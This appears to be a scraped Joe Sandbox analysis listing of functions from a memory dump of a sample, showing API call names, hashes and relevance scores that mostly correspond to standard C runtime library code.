                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                • String ID:
                                                • API String ID: 1909145217-0
                                                • Opcode ID: c52e1b09a50c06291591c65438d86ecc49300948b8df8488fe33684004ad8daa
                                                • Instruction ID: fed18850e507b96439b31f8974cccc9d6d3212bfff3d343bb3147e2f5512e6ad
                                                • Opcode Fuzzy Hash: c52e1b09a50c06291591c65438d86ecc49300948b8df8488fe33684004ad8daa
                                                • Instruction Fuzzy Hash: 03218021B0AB4281EE51BB21ED48069E2D1FB48BD0FC4483AD9CE17358DE7CE485CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E906AD0 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: f9202979a7542460e9361c27ea97c69b921579607e91b3df6b9d0368e6733a29
                                                • Instruction ID: d2f128813f0ea6278b9ad407cd5775872b1d51adce1ef685cedd0184859c35a8
                                                • Opcode Fuzzy Hash: f9202979a7542460e9361c27ea97c69b921579607e91b3df6b9d0368e6733a29
                                                • Instruction Fuzzy Hash: A201A531A2DA0581FB50AF26FC44165A360FB09B90FC42536DE9E47760CF3CD8848B11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E905278 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E905282
                                                • FlsGetValue.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E905290
                                                • SetLastError.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E9052E8
                                                  • Part of subcall function 00007FF72E9075A0: Sleep.KERNEL32(?,?,?,00007FF72E9052AB,?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D), ref: 00007FF72E9075E5
                                                • FlsSetValue.KERNEL32(?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D,?,?,?,?,00007FF72E903612), ref: 00007FF72E9052BC
                                                • GetCurrentThreadId.KERNEL32 ref: 00007FF72E9052D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue_lock$CurrentSleepThread
                                                • String ID:
                                                • API String ID: 2194181773-0
                                                • Opcode ID: ad224dec72481b030033efa864b9fd969c3be0249bf7685e36258ed4f4ac13e2
                                                • Instruction ID: 82c3ae1f9502d10215d7fe6f36f22bd9fbf04162015c3a083982fd6dd94ff421
                                                • Opcode Fuzzy Hash: ad224dec72481b030033efa864b9fd969c3be0249bf7685e36258ed4f4ac13e2
                                                • Instruction Fuzzy Hash: 85011231A09742C6FF54BB65EC48038A291EF48770BD4863DD9AD423D1EE3CE4448A26
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E90424C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                                • String ID: A$Z
                                                • API String ID: 3686281101-4098844585
                                                • Opcode ID: 896e6f80aa2ca831a9021138f11eca69d54130ecbc77755b1876e4c48633c6f8
                                                • Instruction ID: 54d74fcefdd941e425081a001890482e3afa312405bd1ea2724cc8dfe8d03279
                                                • Opcode Fuzzy Hash: 896e6f80aa2ca831a9021138f11eca69d54130ecbc77755b1876e4c48633c6f8
                                                • Instruction Fuzzy Hash: 5021D662F1829385FB707B15D94017DF6A0EB51BA0FD8413BEADD076D8CE2CD8818B26
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E902344 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FilePointer
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 566066777-3502785670
                                                • Opcode ID: c5291f9e83ebfd14ac5185bb3fe49c08fc751065ba87d2c77bd2fa49d6794c12
                                                • Instruction ID: 66e8321322bb848b4788902b0c78d50bda58d54f9ffdc0c5b4493ae7ae64cd00
                                                • Opcode Fuzzy Hash: c5291f9e83ebfd14ac5185bb3fe49c08fc751065ba87d2c77bd2fa49d6794c12
                                                • Instruction Fuzzy Hash: 86116D32A09B4686DB14EB05F88402DB3F5FB48B84B95813ADBEC43754EF79D996CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9039F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1646373207-3502785670
                                                • Opcode ID: 56eea7980c05d2758158436c454b14cc82090c226630c926929492b140c91de7
                                                • Instruction ID: 4589a9c2a4c7d0ef73f98708a4ce22d43933a38a6c93298a6d959ef792bd30dc
                                                • Opcode Fuzzy Hash: 56eea7980c05d2758158436c454b14cc82090c226630c926929492b140c91de7
                                                • Instruction Fuzzy Hash: FAF0BE61B09A0796EE44FB5AEC90038A361EF48F84BC8903ACB9D07354EE3CD594CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E90588C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF72E9058D5,?,?,00000028,00007FF72E908D9D,?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415), ref: 00007FF72E90589B
                                                • GetProcAddress.KERNEL32(?,?,000000FF,00007FF72E9058D5,?,?,00000028,00007FF72E908D9D,?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415), ref: 00007FF72E9058B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 1646373207-1276376045
                                                • Opcode ID: f78ffa323bab2fd1d92cb2e075742adc844aeb1b3a717ca98cca0424df0a5935
                                                • Instruction ID: 3a1fb03f25259c323c6e83b2eedd5e861888a31feceed2568392b09e62ecf561
                                                • Opcode Fuzzy Hash: f78ffa323bab2fd1d92cb2e075742adc844aeb1b3a717ca98cca0424df0a5935
                                                • Instruction Fuzzy Hash: 68E01260F1A60646FF19BBA0FC841745361EF49B00BC8943ECD9E46390EEACA64DCB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9083CC Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                • String ID:
                                                • API String ID: 27599310-0
                                                • Opcode ID: 531920fce68136e9c35c3a2682e57cc816ebcda5ab9a9cb6cfa04ab9307bab91
                                                • Instruction ID: 45e52dc0f8c428bfa106a654589a44f8e36e0e0fb3af29b3be7eaefd930fce95
                                                • Opcode Fuzzy Hash: 531920fce68136e9c35c3a2682e57cc816ebcda5ab9a9cb6cfa04ab9307bab91
                                                • Instruction Fuzzy Hash: BA515C32F0C64286EA79AB15EC4423EB292EB84764FD4443FD9CE46794DE3CE445CA23
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E907074 Relevance: 6.1, APIs: 4, Instructions: 102COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$StringTypemalloc
                                                • String ID:
                                                • API String ID: 4066956681-0
                                                • Opcode ID: e5cffde83cb833e0932887e32bd2dd3c7c25309736ff150266516a81da26abab
                                                • Instruction ID: db92acd2d3356dcf618f85b49d0f1c8b633a1cdec9d44207b16381188d28882e
                                                • Opcode Fuzzy Hash: e5cffde83cb833e0932887e32bd2dd3c7c25309736ff150266516a81da26abab
                                                • Instruction Fuzzy Hash: 8141A462A04B8186EB60BF25DC00169A395FF45BB4FD8423BEE6D477D4DE3DE4058B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E905114 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _amsg_exit_getptd$_lock
                                                • String ID:
                                                • API String ID: 3670291111-0
                                                • Opcode ID: 40fa8a02b52b9aa11293c6beee845f869b20b37b19334275766aa323fb9eacb8
                                                • Instruction ID: fa2430df5ef43d80fa580065d8573c526433491a51f84a8599d7e9b23be244b4
                                                • Opcode Fuzzy Hash: 40fa8a02b52b9aa11293c6beee845f869b20b37b19334275766aa323fb9eacb8
                                                • Instruction Fuzzy Hash: F2F0F921A1A14686FBA4BB65DC417B8A2A2EF44740FC8113EDA8D073D2DE1CA8448B37
                                                Uniqueness

                                                Uniqueness Score: -1.00%